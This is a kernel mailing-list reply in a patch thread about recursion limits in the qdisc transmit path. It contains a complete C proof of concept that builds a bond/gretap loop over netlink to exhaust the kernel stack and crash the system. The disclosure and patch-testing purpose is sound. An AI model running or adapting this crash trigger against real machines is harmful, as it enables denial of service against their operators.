* Re: [PATCH net] net/core: add xmit recursion limit to qdisc transmit path
2026-03-03 4:30 ` Eric Dumazet
@ 2026-03-03 5:06 ` Xiang Mei
2026-03-03 9:43 ` Weiming Shi
1 sibling, 0 replies; 5+ messages in thread
From: Xiang Mei @ 2026-03-03 5:06 UTC (permalink / raw)
To: Eric Dumazet
Cc: bestswngs, security, davem, kuba, pabeni, horms, netdev,
linux-kernel
On Tue, Mar 03, 2026 at 05:30:11AM +0100, Eric Dumazet wrote:
> On Tue, Mar 3, 2026 at 3:37 AM <bestswngs@gmail.com> wrote:
> >
> > From: Weiming Shi <bestswngs@gmail.com>
> >
> > __dev_queue_xmit() has two transmit code paths depending on whether the
> > device has a qdisc attached:
> >
> > 1. Qdisc path (q->enqueue): calls __dev_xmit_skb()
> > 2. No-qdisc path: calls dev_hard_start_xmit() directly
> >
> > Commit 745e20f1b626 ("net: add a recursion limit in xmit path") added
> > recursion protection to the no-qdisc path via dev_xmit_recursion()
> > check and dev_xmit_recursion_inc()/dec() tracking. However, the qdisc
> > path performs no recursion depth checking at all.
> >
> > This allows unbounded recursion through qdisc-attached devices. For
> > example, a bond interface in broadcast mode with gretap slaves whose
> > remote endpoints route back through the bond creates an infinite
> > transmit loop that exhausts the kernel stack:
>
> Non lltx drivers would deadlock in HARD_TX_LOCK().
>
> I would prefer we try to fix this issue at configuration time instead
> of adding yet another expensive operations in the fast path.
>
Thanks for the review and advice.
Weiming is going to discuss more about the paching when he get back to his
computer.
> Can you provide a test ?
Here is a PoC. It may trigger other crashes since the uncontrolled stack
increasing, the expected crash is
"BUG: KASAN: stack-out-of-bounds in __unwind_start+0x2f/0x7a0".
```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/if_link.h>
#include <linux/if_tunnel.h>
#include <linux/ip.h>
#include <linux/neighbour.h>
#include <arpa/inet.h>
#include <sched.h>
extern unsigned int if_nametoindex(const char *__ifname);
#ifndef IFF_UP
#define IFF_UP 0x1
#endif
struct nlmsg {
char *pos;
int nesting;
struct nlattr *nested[8];
char buf[8192];
};
static void nl_init(struct nlmsg *nlmsg, int typ, int flags,
const void *data, int size)
{
memset(nlmsg, 0, sizeof(*nlmsg));
struct nlmsghdr *hdr = (struct nlmsghdr *)nlmsg->buf;
hdr->nlmsg_type = typ;
hdr->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | flags;
memcpy(hdr + 1, data, size);
nlmsg->pos = (char *)(hdr + 1) + NLMSG_ALIGN(size);
}
static void nl_attr(struct nlmsg *nlmsg, int typ, const void *data, int size)
{
struct nlattr *attr = (struct nlattr *)nlmsg->pos;
attr->nla_len = sizeof(*attr) + size;
attr->nla_type = typ;
if (size > 0)
memcpy(attr + 1, data, size);
nlmsg->pos += NLMSG_ALIGN(attr->nla_len);
}
static void nl_nest(struct nlmsg *nlmsg, int typ)
{
struct nlattr *attr = (struct nlattr *)nlmsg->pos;
attr->nla_type = typ;
nlmsg->pos += sizeof(*attr);
nlmsg->nested[nlmsg->nesting++] = attr;
}
static void nl_done(struct nlmsg *nlmsg)
{
struct nlattr *attr = nlmsg->nested[--nlmsg->nesting];
attr->nla_len = nlmsg->pos - (char *)attr;
}
static int nl_send(struct nlmsg *nlmsg, int sock)
{
struct nlmsghdr *hdr = (struct nlmsghdr *)nlmsg->buf;
hdr->nlmsg_len = nlmsg->pos - nlmsg->buf;
struct sockaddr_nl addr = { .nl_family = AF_NETLINK };
ssize_t n = sendto(sock, nlmsg->buf, hdr->nlmsg_len, 0,
(struct sockaddr *)&addr, sizeof(addr));
if (n != (ssize_t)hdr->nlmsg_len)
return -1;
n = recv(sock, nlmsg->buf, sizeof(nlmsg->buf), 0);
if (n < 0)
return -1;
if (n < (ssize_t)(sizeof(struct nlmsghdr) + sizeof(struct nlmsgerr)))
return -1;
hdr = (struct nlmsghdr *)nlmsg->buf;
if (hdr->nlmsg_type == NLMSG_ERROR) {
int err = -((struct nlmsgerr *)(hdr + 1))->error;
if (err) {
errno = err;
return -err;
}
}
return 0;
}
static int create_device(int sock, struct nlmsg *nlmsg, const char *name,
const char *kind)
{
struct ifinfomsg hdr = {};
nl_init(nlmsg, RTM_NEWLINK, NLM_F_EXCL | NLM_F_CREATE, &hdr, sizeof(hdr));
nl_attr(nlmsg, IFLA_IFNAME, name, strlen(name) + 1);
nl_nest(nlmsg, IFLA_LINKINFO);
nl_attr(nlmsg, IFLA_INFO_KIND, kind, strlen(kind));
nl_done(nlmsg);
int ret = nl_send(nlmsg, sock);
printf(" create %s (%s): %s\n", name, kind, ret ? strerror(errno) : "ok");
return ret;
}
static int create_bond(int sock, struct nlmsg *nlmsg, const char *name, int mode)
{
struct ifinfomsg hdr = {};
nl_init(nlmsg, RTM_NEWLINK, NLM_F_EXCL | NLM_F_CREATE, &hdr, sizeof(hdr));
nl_attr(nlmsg, IFLA_IFNAME, name, strlen(name) + 1);
nl_nest(nlmsg, IFLA_LINKINFO);
nl_attr(nlmsg, IFLA_INFO_KIND, "bond", 4);
nl_nest(nlmsg, IFLA_INFO_DATA);
uint8_t bond_mode = mode;
nl_attr(nlmsg, IFLA_BOND_MODE, &bond_mode, sizeof(bond_mode));
nl_done(nlmsg);
nl_done(nlmsg);
int ret = nl_send(nlmsg, sock);
printf(" create bond %s (mode=%d): %s\n", name, mode, ret ? strerror(errno) : "ok");
return ret;
}
static int create_gretap(int sock, struct nlmsg *nlmsg, const char *name,
uint32_t remote, int num_tx_queues)
{
struct ifinfomsg hdr = {};
nl_init(nlmsg, RTM_NEWLINK, NLM_F_EXCL | NLM_F_CREATE, &hdr, sizeof(hdr));
nl_attr(nlmsg, IFLA_IFNAME, name, strlen(name) + 1);
uint32_t ntxq = num_tx_queues;
nl_attr(nlmsg, IFLA_NUM_TX_QUEUES, &ntxq, sizeof(ntxq));
nl_nest(nlmsg, IFLA_LINKINFO);
nl_attr(nlmsg, IFLA_INFO_KIND, "gretap", 6);
nl_nest(nlmsg, IFLA_INFO_DATA);
nl_attr(nlmsg, IFLA_GRE_REMOTE, &remote, sizeof(remote));
nl_done(nlmsg);
nl_done(nlmsg);
int ret = nl_send(nlmsg, sock);
printf(" create gretap %s (remote, %d txq): %s\n", name, num_tx_queues,
ret ? strerror(errno) : "ok");
return ret;
}
static int set_master(int sock, struct nlmsg *nlmsg, const char *slave,
const char *master)
{
struct ifinfomsg hdr = {};
hdr.ifi_index = if_nametoindex(slave);
if (!hdr.ifi_index) return -1;
nl_init(nlmsg, RTM_NEWLINK, 0, &hdr, sizeof(hdr));
int master_idx = if_nametoindex(master);
nl_attr(nlmsg, IFLA_MASTER, &master_idx, sizeof(master_idx));
int ret = nl_send(nlmsg, sock);
printf(" enslave %s -> %s: %s\n", slave, master, ret ? strerror(errno) : "ok");
return ret;
}
static int dev_updown(int sock, struct nlmsg *nlmsg, const char *name, int up)
{
struct ifinfomsg hdr = {};
hdr.ifi_index = if_nametoindex(name);
if (!hdr.ifi_index) return -1;
hdr.ifi_flags = up ? IFF_UP : 0;
hdr.ifi_change = IFF_UP;
nl_init(nlmsg, RTM_NEWLINK, 0, &hdr, sizeof(hdr));
int ret = nl_send(nlmsg, sock);
printf(" %s %s: %s\n", up ? "up" : "down", name, ret ? strerror(errno) : "ok");
return ret;
}
static int add_addr4(int sock, struct nlmsg *nlmsg, const char *dev,
const char *addr_str, int prefix)
{
struct ifaddrmsg hdr = {};
hdr.ifa_family = AF_INET;
hdr.ifa_prefixlen = prefix;
hdr.ifa_scope = RT_SCOPE_UNIVERSE;
hdr.ifa_index = if_nametoindex(dev);
struct in_addr addr;
inet_pton(AF_INET, addr_str, &addr);
nl_init(nlmsg, RTM_NEWADDR, NLM_F_CREATE | NLM_F_REPLACE, &hdr, sizeof(hdr));
nl_attr(nlmsg, IFA_LOCAL, &addr, sizeof(addr));
nl_attr(nlmsg, IFA_ADDRESS, &addr, sizeof(addr));
int ret = nl_send(nlmsg, sock);
printf(" addr %s %s/%d: %s\n", dev, addr_str, prefix, ret ? strerror(errno) : "ok");
return ret;
}
static int add_addr6(int sock, struct nlmsg *nlmsg, const char *dev,
const char *addr_str, int prefix)
{
struct ifaddrmsg hdr = {};
hdr.ifa_family = AF_INET6;
hdr.ifa_prefixlen = prefix;
hdr.ifa_scope = RT_SCOPE_UNIVERSE;
hdr.ifa_index = if_nametoindex(dev);
struct in6_addr addr;
inet_pton(AF_INET6, addr_str, &addr);
nl_init(nlmsg, RTM_NEWADDR, NLM_F_CREATE | NLM_F_REPLACE, &hdr, sizeof(hdr));
nl_attr(nlmsg, IFA_LOCAL, &addr, sizeof(addr));
nl_attr(nlmsg, IFA_ADDRESS, &addr, sizeof(addr));
int ret = nl_send(nlmsg, sock);
printf(" addr6 %s %s/%d: %s\n", dev, addr_str, prefix, ret ? strerror(errno) : "ok");
return ret;
}
static int create_veth(int sock, struct nlmsg *nlmsg, const char *name,
const char *peer)
{
struct ifinfomsg hdr = {};
nl_init(nlmsg, RTM_NEWLINK, NLM_F_EXCL | NLM_F_CREATE, &hdr, sizeof(hdr));
nl_attr(nlmsg, IFLA_IFNAME, name, strlen(name) + 1);
nl_nest(nlmsg, IFLA_LINKINFO);
nl_attr(nlmsg, IFLA_INFO_KIND, "veth", 4);
nl_nest(nlmsg, IFLA_INFO_DATA);
nl_nest(nlmsg, 1 /* VETH_INFO_PEER */);
nlmsg->pos += sizeof(struct ifinfomsg);
nl_attr(nlmsg, IFLA_IFNAME, peer, strlen(peer) + 1);
nl_done(nlmsg);
nl_done(nlmsg);
nl_done(nlmsg);
int ret = nl_send(nlmsg, sock);
printf(" create veth %s<->%s: %s\n", name, peer, ret ? strerror(errno) : "ok");
return ret;
}
static int add_neigh4(int sock, struct nlmsg *nlmsg, const char *dev,
const char *addr_str, const unsigned char *mac)
{
struct ndmsg hdr = {};
hdr.ndm_family = AF_INET;
hdr.ndm_ifindex = if_nametoindex(dev);
hdr.ndm_state = NUD_PERMANENT;
hdr.ndm_type = 0;
nl_init(nlmsg, RTM_NEWNEIGH, NLM_F_CREATE | NLM_F_REPLACE, &hdr, sizeof(hdr));
struct in_addr addr;
inet_pton(AF_INET, addr_str, &addr);
nl_attr(nlmsg, NDA_DST, &addr, sizeof(addr));
nl_attr(nlmsg, NDA_LLADDR, mac, 6);
int ret = nl_send(nlmsg, sock);
printf(" neigh %s %s: %s\n", dev, addr_str, ret ? strerror(errno) : "ok");
return ret;
}
// Debug: check if routing to dst works through devname
static void debug_route(const char *devname, const char *dst_str)
{
int fd = socket(AF_INET, SOCK_DGRAM, 0);
if (fd < 0) { perror(" debug: socket"); return; }
if (setsockopt(fd, SOL_SOCKET, 25 /* SO_BINDTODEVICE */,
devname, strlen(devname) + 1) < 0) {
printf(" debug: SO_BINDTODEVICE %s: %s\n", devname, strerror(errno));
}
struct sockaddr_in dst = {};
dst.sin_family = AF_INET;
dst.sin_port = htons(9999);
inet_pton(AF_INET, dst_str, &dst.sin_addr);
if (connect(fd, (struct sockaddr *)&dst, sizeof(dst)) < 0) {
printf(" debug: connect to %s via %s: %s\n", dst_str, devname, strerror(errno));
} else {
struct sockaddr_in local = {};
socklen_t len = sizeof(local);
getsockname(fd, (struct sockaddr *)&local, &len);
char local_str[32];
inet_ntop(AF_INET, &local.sin_addr, local_str, sizeof(local_str));
printf(" debug: route to %s via %s OK, local=%s\n", dst_str, devname, local_str);
// Try to actually send a packet
char buf[64] = "test";
ssize_t n = send(fd, buf, sizeof(buf), MSG_DONTWAIT);
printf(" debug: send: %zd (%s)\n", n, n < 0 ? strerror(errno) : "ok");
}
close(fd);
}
// Send a multicast packet through bond0 to actively trigger the recursive path
static void trigger_multicast(const char *devname)
{
int fd = socket(AF_INET, SOCK_DGRAM, 0);
if (fd < 0) {
perror(" trigger: socket");
return;
}
// Bind to device
if (setsockopt(fd, SOL_SOCKET, 25 /* SO_BINDTODEVICE */,
devname, strlen(devname) + 1) < 0) {
perror(" trigger: SO_BINDTODEVICE");
}
// Set multicast TTL
int ttl = 1;
setsockopt(fd, IPPROTO_IP, 33 /* IP_MULTICAST_TTL */, &ttl, sizeof(ttl));
// Send to multicast address 224.0.0.1 (all-hosts)
struct sockaddr_in dst = {};
dst.sin_family = AF_INET;
dst.sin_port = htons(9999);
inet_pton(AF_INET, "224.0.0.1", &dst.sin_addr);
char buf[64] = "trigger";
for (int i = 0; i < 10; i++) {
if (sendto(fd, buf, sizeof(buf), 0,
(struct sockaddr *)&dst, sizeof(dst)) < 0) {
printf(" trigger: sendto #%d: %s\n", i, strerror(errno));
} else {
printf(" trigger: sent multicast #%d\n", i);
}
usleep(100000);
}
close(fd);
}
int main(int argc, char *argv[])
{
printf("[*] PoC: KASAN slab-out-of-bounds Write in __build_flow_key\n");
printf("[*] uid=%d euid=%d\n", getuid(), geteuid());
int sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
if (sock < 0) {
perror("socket(NETLINK_ROUTE)");
return 1;
}
struct nlmsg nlmsg;
struct in_addr remote;
inet_pton(AF_INET, "10.1.1.2", &remote);
unsigned char fake_mac[6] = {0x00, 0x11, 0x22, 0x33, 0x44, 0x55};
// Bring up loopback first
printf("[*] Step 0: Bring up loopback...\n");
dev_updown(sock, &nlmsg, "lo", 1);
printf("[*] Step 1: Create bond0 in broadcast mode (mode 3)...\n");
create_bond(sock, &nlmsg, "bond0", 3);
printf("[*] Step 2: Bring bond0 UP and assign IPv4...\n");
dev_updown(sock, &nlmsg, "bond0", 1);
add_addr4(sock, &nlmsg, "bond0", "10.1.1.1", 24);
// Create MULTIPLE gretap tunnels, each with a DIFFERENT remote address.
// All remotes are in the 10.1.1.0/24 subnet (reachable through bond0).
// With broadcast mode, bond sends to all slaves. Each gretap has its OWN
// qdisc instances (pfifo_fast with TCQ_F_NOLOCK). When bond recurses:
// - Level 0: gretap1's qdisc runs → tunnel → back to bond
// - Level 1: gretap1 blocked (running), gretap2 runs → tunnel → bond
// - Level 2: gretap1,2 blocked, gretap3 runs → tunnel → bond
// - Level 3: gretap1,2,3 blocked, gretap4 runs → tunnel → bond
// Each level adds ~8-12KB of stack (with KASAN_STACK). With 32KB stack
// (KASAN doubles it), 4 levels = ~40-50KB → overflow!
// Pre-populate ARP entries BEFORE enslaving gretap devices.
// This ensures that when IGMP/NDP is triggered by enslaving, the
// outer GRE packets can be sent immediately (no ARP resolution queue).
printf("[*] Step 3: Pre-populate ARP entries for all remotes...\n");
int num_gretaps = 7;
char gname[16], remote_str[32];
for (int i = 0; i < num_gretaps; i++) {
snprintf(remote_str, sizeof(remote_str), "10.1.1.%d", i + 2);
fake_mac[5] = 0x55 + i;
add_neigh4(sock, &nlmsg, "bond0", remote_str, fake_mac);
}
printf("[*] Step 4: Create 4 gretap tunnels (different remotes, 9 txq each)...\n");
for (int i = 0; i < num_gretaps; i++) {
snprintf(gname, sizeof(gname), "gretap%d", i + 1);
snprintf(remote_str, sizeof(remote_str), "10.1.1.%d", i + 2);
inet_pton(AF_INET, remote_str, &remote);
create_gretap(sock, &nlmsg, gname, remote.s_addr, 9);
}
printf("[*] Step 5: Enslave all gretaps to bond0 and bring up...\n");
for (int i = 0; i < num_gretaps; i++) {
snprintf(gname, sizeof(gname), "gretap%d", i + 1);
set_master(sock, &nlmsg, gname, "bond0");
dev_updown(sock, &nlmsg, gname, 1);
}
printf("[*] Step 6: Trigger - Add IPv6 address (triggers DAD through bond)...\n");
// DAD sends NDP through all slaves → gretap → tunnel → bond → recursion
add_addr6(sock, &nlmsg, "bond0", "fd00::1", 64);
sleep(3);
printf("[*] Step 7: Toggle bond0 to retrigger IGMP/MLD...\n");
dev_updown(sock, &nlmsg, "bond0", 0);
usleep(200000);
dev_updown(sock, &nlmsg, "bond0", 1);
add_neigh4(sock, &nlmsg, "bond0", "10.1.1.2", fake_mac);
add_addr6(sock, &nlmsg, "bond0", "fd01::1", 64);
sleep(3);
printf("[*] Step 8: Send multicast packets through bond0...\n");
trigger_multicast("bond0");
printf("[*] Done. Check dmesg for KASAN report.\n");
sleep(5);
close(sock);
return 0;
}
```
Please let me know if it doesn't trigger the bug.
Thanks,
Xiang
>
> Thanks.
^ permalink raw reply [flat|nested] 5+ messages in thread